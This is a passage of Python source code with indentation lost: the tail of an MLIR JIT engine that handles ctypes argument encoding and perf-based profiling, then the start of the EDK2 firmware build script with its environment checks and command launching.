(element_ctypes_input_type,) = element_ctypes_input_types
ctypes_input_types = [ctypes.POINTER(element_ctypes_input_type)]
def encoder(arg: Union[list, tuple]) -> List[ctypes.Array]:
if not isinstance(arg, (list, tuple)):
raise TypeError(
f"{repr(arg)} is expected to be an instance of {list} or {tuple}."
)
ArrayType = element_ctypes_input_type * len(arg)
encoded_elements = sum(map(element_encoder, arg), [])
array = ArrayType(*encoded_elements)
return [array]
return ctypes_input_types, encoder
def input_llvm_type_to_ctypes(mlir_type: mlir.astnodes.Type) -> Tuple[list, Callable]:
if isinstance(mlir_type, _DIALECT_TYPES["llvm"]["LLVMPtr"]):
result = input_llvm_pointer_to_ctypes(mlir_type)
elif isinstance(mlir_type, _DIALECT_TYPES["llvm"]["LLVMVec"]):
raise NotImplementedError(
f"Converting {mlir_type} to ctypes not yet supported."
)
else:
raise NotImplementedError(
f"Converting {mlir_type} to ctypes not yet supported."
)
return result
def input_scalar_to_ctypes(mlir_type: mlir.astnodes.Type) -> Tuple[list, Callable]:
np_type, ctypes_type = convert_mlir_atomic_type(mlir_type)
ctypes_input_types = [ctypes_type]
def encoder(arg) -> list:
try:
can_cast = np.can_cast(arg, np_type, "safe")
except TypeError:
can_cast = False
if not can_cast:
raise TypeError(f"{repr(arg)} cannot be cast to {np_type}")
if not isinstance(arg, (np.number, int, float)):
raise TypeError(
f"{repr(arg)} is expected to be a scalar with dtype {np_type}"
)
return [arg]
return ctypes_input_types, encoder
def input_type_to_ctypes(mlir_type: mlir.astnodes.Type) -> Tuple[list, Callable]:
# TODO handle all other child classes of mlir.astnodes.Type
# TODO consider inlining this if it only has 2 cases
if isinstance(mlir_type, mlir.astnodes.PrettyDialectType):
result = input_pretty_dialect_type_to_ctypes(mlir_type)
elif isinstance(mlir_type, mlir.astnodes.RankedTensorType):
result = input_tensor_to_ctypes(mlir_type)
elif any(
isinstance(mlir_type, llvm_type)
for llvm_type in _DIALECT_TYPES["llvm"].values()
):
result = input_llvm_type_to_ctypes(mlir_type)
else:
result = input_scalar_to_ctypes(mlir_type)
return result
def mlir_function_input_encoders(
mlir_function: mlir.astnodes.Function,
) -> Tuple[List[type], List[Callable]]:
ctypes_input_types = []
encoders: List[Callable] = []
for arg in mlir_function.args:
arg_ctypes_input_types, encoder = input_type_to_ctypes(arg.type)
ctypes_input_types += arg_ctypes_input_types
encoders.append(encoder)
return ctypes_input_types, encoders
####################
# PyMLIR Utilities #
####################
def _resolve_type_aliases(
node: Any,
type_alias_table: Dict[str, mlir.astnodes.PrettyDialectType],
) -> Any:
if isinstance(node, (mlir.astnodes.Node, mlir.astnodes.Module)):
for field in node._fields_:
field_value = getattr(node, field)
field_type = type(field_value)
if field_type in (list, tuple):
resolved_field_value = field_type(
_resolve_type_aliases(sub_node, type_alias_table)
for sub_node in field_value
)
elif issubclass(field_type, mlir.astnodes.TypeAlias):
alias_name = field_value.value
alias_value = type_alias_table[alias_name]
resolved_field_value = _resolve_type_aliases(
alias_value, type_alias_table
)
else:
resolved_field_value = _resolve_type_aliases(
field_value, type_alias_table
)
setattr(node, field, resolved_field_value)
return node
def resolve_type_aliases(module: mlir.astnodes.Module) -> None:
"""Modifies module in place."""
# TODO this is currently only called by MlirJitEngine.add, which only uses the functions in the
# module, but we resolve all AST nodes, not just the functions. Consider whether or not it's necessary
# to resolve all AST nodes besides those of type mlir.astnodes.AttrAlias and mlir.astnodes.Function.
type_alias_table = {
alias.name.value: alias.value
for alias in module.body
if isinstance(alias, mlir.astnodes.TypeAliasDef)
}
if len(type_alias_table) > 0:
_resolve_type_aliases(module, type_alias_table)
return
def parse_mlir_functions(
mlir_text: Union[str, bytes], cli: MlirOptCli
) -> mlir.astnodes.Module:
if isinstance(mlir_text, str):
mlir_text = mlir_text.encode()
# Run text thru mlir-opt to apply aliases and flatten function signatures
mlir_text = cli.apply_passes(mlir_text, [])
# Remove everything except function signatures
func_lines = [
line.strip() for line in mlir_text.splitlines() if line.lstrip()[:5] == "func "
]
# Add in trailing "}" to make defined functions valid
func_lines = [line + "}" if line[-1] == "{" else line for line in func_lines]
mlir_ast = mlir.parse_string("\n".join(func_lines))
return mlir_ast
#################
# MlirJitEngine #
#################
class MlirJitEngine:
def __init__(self, cli_executable=None, cli_options=None, llvmlite_engine=None):
if llvmlite_engine is None:
# Create a target machine representing the host
target = llvm.Target.from_default_triple()
target_machine = target.create_target_machine()
# And an execution engine with an empty backing module
backing_mod = llvm.parse_assembly("")
llvmlite_engine = llvm.create_mcjit_compiler(backing_mod, target_machine)
self._engine = llvmlite_engine
self.default_profile_dir = tempfile.TemporaryDirectory()
self.current_profile_dir: Optional[str] = None
self.c_compiler = distutils.ccompiler.new_compiler()
self._cli = MlirOptCli(cli_executable, cli_options)
self.name_to_callable: Dict[str, Callable] = {}
return
@property
def profile_dir_name(self) -> str:
if self.current_profile_dir is not None:
# TODO consider making a context manager for setting self.current_profile_dir
return self.current_profile_dir
return self.default_profile_dir.name
def profiled_function(
self, main_callable: Callable, symbol_to_profile: str
) -> Callable:
"""Decorator to profile a function via Linux's perf tool."""
# set this at the time that decorated_func is created and
# not at the time it is called as the value of
# self.profile_dir_name may change.
perf_data_file_name = os.path.join(
self.profile_dir_name, f"perf-{uuid.uuid4()}.data"
)
def mp_func(queue: mp.SimpleQueue, *args):
# send pid to decorated_func
queue.put(os.getpid())
# wait for decorated_func to signal start of execution
start_signal = queue.get()
assert start_signal == "start"
# execute the function
result = main_callable(*args)
# return the result on the queue
queue.put(result)
return
def decorated_func(*args) -> Any:
# get pid from mp_func
q = mp.SimpleQueue()
execution_process = mp.Process(target=mp_func, args=(q, *args))
execution_process.start()
execution_process_id = q.get()
# start profiling
record_process = subprocess.Popen(
"/bin/bash",
stdin=subprocess.PIPE,
stdout=subprocess.DEVNULL,
stderr=subprocess.PIPE,
)
record_command = f"""
perf record -g -p {execution_process_id} --output={perf_data_file_name}
exit
"""
record_process.stdin.write(record_command.encode())
record_process.stdin.flush()
# wait for profiling to initialize
for _ in range(3): # FIXME how do we truly know perf-record is ready?
record_process.stderr.readline()
# signal mp_func to start execution
q.put("start") # dummy value
# wait for execution to finish
result = q.get()
execution_process.join()
execution_process.close()
# wait for profiling to finish
while record_process.poll() is None:
pass
# gather profiling results
annotate_command = f"perf annotate --stdio --symbol {symbol_to_profile} -l --input={perf_data_file_name}"
annotate_process = subprocess.Popen(
annotate_command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
) # combines stdout and stderr
stdout_string, _ = annotate_process.communicate()
stdout_string = stdout_string.decode()
# print results
profile_text = stdout_string.strip()
profile_text = "\n" + profile_text
profile_text = profile_text.replace("\n", "\n ")
profile_text = "Profile Results:" + profile_text
print(profile_text)
return result
return decorated_func
def _add_llvm_module(
self, mod: llvm.module.ModuleRef, profile: Union[bool, ctypes.CDLL]
) -> Optional[ctypes.CDLL]:
if profile:
o_file_bytes_list = []
self._engine.set_object_cache(
notify_func=lambda module, buffer: o_file_bytes_list.append(buffer)
)
self._engine.add_module(mod)
self._engine.finalize_object()
self._engine.run_static_constructors()
if profile:
files_to_link = [_SPARSE_UTILS_SO]
# On the first call (globally) to self._engine.add_module,
# the notify_func is called twice. The first time is on some
# buffer with no symbols and the second is on the buffer
# containig the .o code for mod. On all other calls,
# we have len(o_file_bytes_list) == 1.
# Thus, we use the last element of o_file_bytes_list.
assert len(o_file_bytes_list) in (1, 2)
o_file_bytes = o_file_bytes_list[-1]
o_file_name = f"mod-{uuid.uuid4()}.o"
o_file_name = os.path.join(self.profile_dir_name, o_file_name)
with open(o_file_name, "wb") as f:
f.write(o_file_bytes_list[-1])
files_to_link.append(o_file_name)
if isinstance(profile, ctypes.CDLL):
files_to_link.append(profile._name)
so_file_name = f"shared-{uuid.uuid4()}.so"
so_file_name = os.path.join(self.profile_dir_name, so_file_name)
self.c_compiler.link_shared_object(files_to_link, so_file_name, debug=True)
ctypes.cdll.LoadLibrary(so_file_name)
shared_lib = ctypes.CDLL(so_file_name)
self._engine.set_object_cache(notify_func=None)
else:
shared_lib = None
return shared_lib
def _add_mlir_module(
self,
mlir_text: bytes,
passes: List[str],
*,
debug: bool = False,
profile: Union[bool, ctypes.CDLL] = False,
) -> Optional[Union[DebugResult, ctypes.CDLL]]:
"""Translates MLIR code -> LLVM dialect of MLIR -> actual LLVM IR."""
if profile:
prof_filename = os.path.join(
self.profile_dir_name, f"prof-{uuid.uuid4()}.mlir"
)
with open(prof_filename, "wb") as f:
f.write(mlir_text)
mlir_text = prof_filename
if debug:
try:
llvm_dialect_text = self._cli.apply_passes(mlir_text, passes)
except MlirOptError as e:
return e.debug_result
else:
llvm_dialect_text = self._cli.apply_passes(mlir_text, passes)
mlir_translate_run = subprocess.run(
["mlir-translate", "--mlir-to-llvmir"],
input=llvm_dialect_text.encode(),
capture_output=True,
)
if mlir_translate_run.returncode != 0:
raise RuntimeError(
f"mlir-translate failed on the following input: \n{llvm_dialect_text}"
)
llvm_ir_text = mlir_translate_run.stdout.decode()
# Create a LLVM module object from the IR
mod = llvm.parse_assembly(llvm_ir_text)
mod.verify()
# Now add the module and make sure it is ready for execution
optional_shared_lib = self._add_llvm_module(mod, profile)
return optional_shared_lib
def _generate_zero_or_single_valued_functions(
self,
mlir_functions: Iterable[mlir.astnodes.Function],
shared_lib: Optional[ctypes.CDLL],
) -> Dict[str, Callable]:
"""Generates a Python callable from a function returning zero values or one value."""
name_to_callable: Dict[str, Callable] = {}
for mlir_function in mlir_functions:
name: str = mlir_function.name.value
mlir_types = mlir_function.result_types
if not isinstance(mlir_types, list):
ctypes_return_type, decoder = return_type_to_ctypes(mlir_types)
elif len(mlir_types) == 0:
ctypes_return_type = ctypes.c_char # arbitrary dummy type
decoder = lambda *args: None
else:
raise ValueError(
f"MLIR functions with multiple return values should be handled elsewhere."
)
ctypes_input_types, encoders = mlir_function_input_encoders(mlir_function)
if shared_lib is not None:
c_callable = getattr(shared_lib, name)
c_callable.argtypes = ctypes_input_types
c_callable.restype = ctypes_return_type
else:
function_pointer: int = self._engine.get_function_address(name)
if function_pointer == 0:
raise ValueError(
f"The address for the function {repr(name)} is the null pointer."
)
c_callable = ctypes.CFUNCTYPE(ctypes_return_type, *ctypes_input_types)(
function_pointer
)
def python_callable(mlir_function, encoders, c_callable, decoder, *args):
if len(args) != len(mlir_function.args):
raise ValueError(
f"{name} expected {len(mlir_function.args)} args but got {len(args)}."
)
encoded_args = (encoder(arg) for arg, encoder in zip(args, encoders))
encoded_args = sum(encoded_args, [])
encoded_result = c_callable(*encoded_args)
result = decoder(encoded_result)
return result
bound_func = partial(
python_callable, mlir_function, encoders, c_callable, decoder
)
if shared_lib is not None:
bound_func = self.profiled_function(bound_func, name)
name_to_callable[name] = bound_func
return name_to_callable
def _lower_types_to_strings(
self, ast_types: Iterable[mlir.astnodes.Type], passes: List[str]
) -> Dict[str, str]:
"""
Uses mlir-opt to lower types. This assumes that the passes will
lower to the LLVM dialect.
"""
# TODO this costs one mlir-opt subprocess ; can we avoid it?
# TODO must do string manipulation bc PyMLIR doesn't work with nested LLVM dialect
# types, e.g. !llvm.struct<(ptr<f32>, ptr<f32>, i64, array<2 x i64>, array<2 x i64>)
ast_type_strings = list({ast_type.dump() for ast_type in ast_types})
if len(ast_type_strings) == 0:
return {}
padding = int(np.ceil(np.log10(len(ast_types))))
dummy_declarations_string = "\n".join(
f"func private @func_{i:#0{padding}}() -> {ast_type_string}"
for i, ast_type_string in enumerate(ast_type_strings)
).encode()
lowered_text = self._cli.apply_passes(dummy_declarations_string, passes)
lowered_lines = list(filter(len, lowered_text.splitlines()))
assert lowered_lines[0] == 'module attributes {llvm.data_layout = ""} {'
assert lowered_lines[-1] == "}"
lowered_lines = lowered_lines[1:-1]
assert all(
line.endswith(' attributes {sym_visibility = "private"}')
for line in lowered_lines
)
assert all(line.startswith(" llvm.func @func_") for line in lowered_lines)
lowered_type_strings = [line[24 + padding : -40] for line in lowered_lines]
return dict(zip(ast_type_strings, lowered_type_strings))
def _generate_mlir_string_for_multivalued_functions(
self, mlir_functions: Iterable[mlir.astnodes.Function], passes: List[str]
) -> Tuple[str, List[str], List[str]]:
result_type_name_to_lowered_result_type_name = self._lower_types_to_strings(
sum((mlir_function.result_types for mlir_function in mlir_functions), []),
passes,
)
# Generate conglomerate MLIR string for all wrappers
mlir_wrapper_texts: List[str] = []
names = [mlir_function.name.value for mlir_function in mlir_functions]
wrapper_names = [name + "wrapper" for name in names]
for mlir_function, wrapper_name in zip(mlir_functions, wrapper_names):
lowered_result_type_names = [
result_type_name_to_lowered_result_type_name[result_type.dump()]
for result_type in mlir_function.result_types
]
joined_result_types = ", ".join(lowered_result_type_names)
joined_original_arg_signature = ", ".join(
arg.dump() for arg in mlir_function.args
)
declaration = f"func private @{mlir_function.name.value}({joined_original_arg_signature}) -> ({joined_result_types})"
new_var_names = (f"var{i}" for i in itertools.count())
arg_names: Set[str] = {arg.name.value for arg in mlir_function.args}
num_results = len(mlir_function.result_types)
lowered_result_arg_types = [
f"!llvm.ptr<{result_type_name}>"
for result_type_name in lowered_result_type_names
]
result_arg_names = (name for name in new_var_names if name not in arg_names)
result_arg_names = list(itertools.islice(result_arg_names, num_results))
wrapper_signature = ", ".join(
f"%{name}: {result_arg_type}"
for name, result_arg_type in zip(
result_arg_names, lowered_result_arg_types
)
)
if len(mlir_function.args) > 0:
wrapper_signature += ", " + joined_original_arg_signature
joined_arg_types = ", ".join(arg.type.dump() for arg in mlir_function.args)
joined_arg_names = ", ".join(arg.name.dump() for arg in mlir_function.args)
aggregate_result_var_name = next(new_var_names)
body_lines = itertools.chain(
[
f"%{aggregate_result_var_name}:{num_results} "
f"= call @{mlir_function.name.value}({joined_arg_names}) "
f": ({joined_arg_types}) -> ({joined_result_types})"
],
(
f"llvm.store %{aggregate_result_var_name}#{i}, %{result_arg_name} : {result_arg_type}"
for i, (result_arg_name, result_arg_type) in enumerate(
zip(result_arg_names, lowered_result_arg_types)
)
),
)
body = "\n ".join(body_lines)
mlir_wrapper_text = f"""
{declaration}
func @{wrapper_name}({wrapper_signature}) -> () {{
{body}
return
}}
"""
mlir_wrapper_texts.append(mlir_wrapper_text)
mlir_text = "\n".join(mlir_wrapper_texts)
return mlir_text, names, wrapper_names
def _generate_multivalued_functions(
self,
mlir_functions: Iterable[mlir.astnodes.Function],
passes: List[str],
internal_shared_lib: Optional[ctypes.CDLL],
) -> Dict[str, Callable]:
name_to_callable: Dict[str, Callable] = {}
(
mlir_text,
names,
wrapper_names,
) = self._generate_mlir_string_for_multivalued_functions(mlir_functions, passes)
# this is guaranteed to not raise exceptions since the user-provided
# code was already added (failures would occur then)
wrapper_shared_lib = self._add_mlir_module(
mlir_text.encode(), passes, profile=internal_shared_lib
)
assert bool(wrapper_shared_lib) == bool(internal_shared_lib)
# Generate callables
for mlir_function, name, wrapper_name in zip(
mlir_functions, names, wrapper_names
):
ctypes_input_types, input_encoders = mlir_function_input_encoders(
mlir_function
)
ctypes_result_arg_pointer_types = []
ctypes_result_arg_types = []
decoders = []
for result_type in mlir_function.result_types:
result_type_ctypes_type, decoder = return_type_to_ctypes(result_type)
ctypes_result_arg_pointer_types.append(
ctypes.POINTER(result_type_ctypes_type)
)
ctypes_result_arg_types.append(result_type_ctypes_type)
decoders.append(decoder)
if wrapper_shared_lib is not None:
c_callable = getattr(wrapper_shared_lib, wrapper_name)
c_callable.argtypes = (
ctypes_result_arg_pointer_types + ctypes_input_types
)
c_callable.restype = None
else:
function_pointer: int = self._engine.get_function_address(wrapper_name)
if function_pointer == 0:
raise ValueError(
f"The address for the function {repr(wrapper_name)} is the null pointer."
)
c_callable = ctypes.CFUNCTYPE(
None, *ctypes_result_arg_pointer_types, *ctypes_input_types
)(function_pointer)
def python_callable(
mlir_function,
ctypes_result_arg_types,
input_encoders,
c_callable,
decoders,
*args,
) -> tuple:
if len(args) != len(mlir_function.args):
raise ValueError(
f"{mlir_function.name.value} expected {len(mlir_function.args)} "
f"args but got {len(args)}."
)
result_arg_values = [
result_arg_type() for result_arg_type in ctypes_result_arg_types
]
result_arg_pointers = [
ctypes.pointer(value) for value in result_arg_values
]
encoded_args = (
encoder(arg) for arg, encoder in zip(args, input_encoders)
)
encoded_args = itertools.chain(*encoded_args)
returned_result = c_callable(*result_arg_pointers, *encoded_args)
assert returned_result is None
return tuple(
decoder(result_arg_pointer.contents)
for decoder, result_arg_pointer in zip(
decoders, result_arg_pointers
)
)
bound_func = partial(
python_callable,
mlir_function,
ctypes_result_arg_types,
input_encoders,
c_callable,
decoders,
)
if wrapper_shared_lib is not None:
bound_func = self.profiled_function(bound_func, name)
name_to_callable[mlir_function.name.value] = bound_func
return name_to_callable
def _walk_module(self, mlir_ast):
"""Recursively walks an MLIR Module, yielding all non-Module objects"""
assert isinstance(
mlir_ast, mlir.astnodes.Module
), f"Cannot walk a {type(mlir_ast)}; expected a Module"
for item in mlir_ast.body:
if isinstance(item, mlir.astnodes.Module):
yield from self._walk_module(item)
else:
yield item
def add(
self,
mlir_text: Union[str, bytes],
passes: Tuple[str],
*,
debug: bool = False,
profile: bool = False,
profile_result_directory: Optional[str] = None,
) -> Union[List[str], DebugResult]:
"""List of new function names added."""
if profile_result_directory is not None:
if not profile:
raise ValueError(
"Cannot specify a profile result directory without also enabling profiling."
)
self.current_profile_dir = profile_result_directory
if profile:
if not sys.platform.startswith("linux"):
raise NotImplementedError("Profiling only supported on linux.")
elif shutil.which("perf") is None:
raise RuntimeError("Profiling requires perf to be installed.")
with open("/proc/sys/kernel/perf_event_paranoid", "r") as f:
perf_event_paranoid_setting = int(f.read().strip())
if perf_event_paranoid_setting != -1: # TODO is this too restrictive?
raise RuntimeError(
"Profiling not permitted since the contents of "
"/proc/sys/kernel/perf_event_paranoid must be -1."
)
if isinstance(mlir_text, str):
mlir_text = mlir_text.encode()
add_mlir_module_result = self._add_mlir_module(
mlir_text, passes, debug=debug, profile=profile
)
if isinstance(add_mlir_module_result, DebugResult):
return add_mlir_module_result
shared_lib = add_mlir_module_result
assert (not profile) == (shared_lib is None)
function_names: List[str] = []
mlir_ast = parse_mlir_functions(mlir_text, self._cli)
mlir_functions: List[mlir.astnodes.Function] = [
obj
for obj in self._walk_module(mlir_ast)
if isinstance(obj, mlir.astnodes.Function) and obj.visibility == "public"
]
# Separate zero/single return valued funcs from multivalued funcs
zero_or_single_valued_funcs = []
multivalued_funcs = []
for mlir_function in mlir_functions:
name: str = mlir_function.name.value
if name in self.name_to_callable:
raise ValueError(f"The function {repr(name)} is already defined.")
function_names.append(name)
if (
not isinstance(mlir_function.result_types, list)
or len(mlir_function.result_types) == 0
):
zero_or_single_valued_funcs.append(mlir_function)
else:
multivalued_funcs.append(mlir_function)
# Compile & add functions
name_to_zero_or_single_callable = (
self._generate_zero_or_single_valued_functions(
zero_or_single_valued_funcs, shared_lib
)
)
# TODO we currently need two separate compilations ; we can avoid this if
# we can use PyMLIR to simply add on the extra functions/wrappers we need
# to handle multivalued functions (we would just parse for an AST, add onto
# the AST, and then dump the AST). This is currently not possible since
# PyMLIR can't parse all MLIR. It'd also be difficult without an IR
# builder (which is currently a PyMLIR WIP).
name_to_multicallable = self._generate_multivalued_functions(
multivalued_funcs, passes, shared_lib
)
for name, python_callable in itertools.chain(
name_to_zero_or_single_callable.items(), name_to_multicallable.items()
):
# python_callable only tracks the function pointer, not the
# function itself. If self._engine, gets garbage collected,
# we get a seg fault. Thus, we must keep the engine alive.
setattr(python_callable, "jit_engine", self)
self.name_to_callable[name] = python_callable
if profile_result_directory is not None:
self.current_profile_dir = None
return function_names
def __getitem__(self, func_name: str) -> Callable:
return self.name_to_callable[func_name]
def __getattr__(self, func_name: str) -> Callable:
return self[func_name]
|
build.py
|
## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2021, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2018, Hewlett Packard Enterprise Development, L.P.<BR>
# Copyright (c) 2020, ARM Limited. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import print_function
from __future__ import absolute_import
import os.path as path
import sys
import os
import re
import glob
import time
import platform
import traceback
import multiprocessing
from threading import Thread,Event,BoundedSemaphore
import threading
from linecache import getlines
from subprocess import Popen,PIPE, STDOUT
from collections import OrderedDict, defaultdict
from edk2basetools.AutoGen.PlatformAutoGen import PlatformAutoGen
from edk2basetools.AutoGen.ModuleAutoGen import ModuleAutoGen
from edk2basetools.AutoGen.WorkspaceAutoGen import WorkspaceAutoGen
from edk2basetools.AutoGen.AutoGenWorker import AutoGenWorkerInProcess,AutoGenManager,\
LogAgent
from edk2basetools.AutoGen import GenMake
from edk2basetools.Common import Misc as Utils
from edk2basetools.Common.TargetTxtClassObject import TargetTxtDict
from edk2basetools.Common.ToolDefClassObject import ToolDefDict
from edk2basetools.build.buildoptions import MyOptionParser
from edk2basetools.Common.Misc import PathClass,SaveFileOnChange,RemoveDirectory
from edk2basetools.Common.StringUtils import NormPath
from edk2basetools.Common.MultipleWorkspace import MultipleWorkspace as mws
from edk2basetools.Common.BuildToolError import *
from edk2basetools.Common.DataType import *
import edk2basetools.Common.EdkLogger as EdkLogger
from edk2basetools.Workspace.WorkspaceDatabase import BuildDB
from edk2basetools.build.BuildReport import BuildReport
from edk2basetools.GenPatchPcdTable.GenPatchPcdTable import PeImageClass,parsePcdInfoFromMapFile
from edk2basetools.PatchPcdValue.PatchPcdValue import PatchBinaryFile
import edk2basetools.Common.GlobalData as GlobalData
from edk2basetools.GenFds.GenFds import GenFds, GenFdsApi
import multiprocessing as mp
from multiprocessing import Manager
from edk2basetools.AutoGen.DataPipe import MemoryDataPipe
from edk2basetools.AutoGen.ModuleAutoGenHelper import WorkSpaceInfo, PlatformInfo
from edk2basetools.GenFds.FdfParser import FdfParser
from edk2basetools.AutoGen.IncludesAutoGen import IncludesAutoGen
from edk2basetools.GenFds.GenFds import resetFdsGlobalVariable
from edk2basetools.AutoGen.AutoGen import CalculatePriorityValue
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if 'PATHEXT' in os.environ:
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData=WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(WorkspaceDir, PackagesPath)
if mws.PACKAGES_PATH:
for Path in mws.PACKAGES_PATH:
if not os.path.exists(Path):
EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData=Path)
elif ' ' in Path:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
Workspace = mws.getWs(Workspace, FilePath)
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag,MemTo=None):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != b"":
LineStr = Line.rstrip().decode(encoding='utf-8', errors='ignore')
if MemTo is not None:
if "Note: including file:" == LineStr.lstrip()[:21]:
MemTo.append(LineStr)
else:
To(LineStr)
MemTo.append(LineStr)
else:
To(LineStr)
else:
break
if ExitFlag.is_set():
break
class MakeSubProc(Popen):
def __init__(self,*args, **argv):
super(MakeSubProc,self).__init__(*args, **argv)
self.ProcOut = []
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir,ModuleAuto = None):
BeginTime = time.time()
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first Argument in following Popen().
# It could be a string or sequence. We find that if command is a string in following Popen(),
# ubuntu may fail with an error message that the command is not found.
# So here we may need convert command from string to list instance.
if platform.system() != 'Windows':
if not isinstance(Command, list):
Command = Command.split()
Command = ' '.join(Command)
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = MakeSubProc(Command, stdout=PIPE, stderr=STDOUT, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure,Proc.ProcOut))
StdOutThread.name = "STDOUT-Redirector"
StdOutThread.daemon = False
StdOutThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
if EndOfProcedure is not None:
EndOfProcedure.set()
if Proc is None:
if not isinstance(Command, type("")):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
# check the return code of the program
if Proc.returncode != 0:
if not isinstance(Command, type("")):
Command = " ".join(Command)
# print out the Response file and its content when make failure
RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
if os.path.isfile(RespFile):
f = open(RespFile)
RespContent = f.read()
f.close()
EdkLogger.info(RespContent)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
if ModuleAuto:
iau = IncludesAutoGen(WorkingDir,ModuleAuto)
if ModuleAuto.ToolChainFamily == TAB_COMPILER_MSFT:
iau.CreateDepsFileForMsvc(Proc.ProcOut)
else:
iau.UpdateDepsFileforNonMsvc()
iau.UpdateDepsFileforTrim()
iau.CreateModuleDeps()
iau.CreateDepsInclude()
iau.CreateDepsTarget()
return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
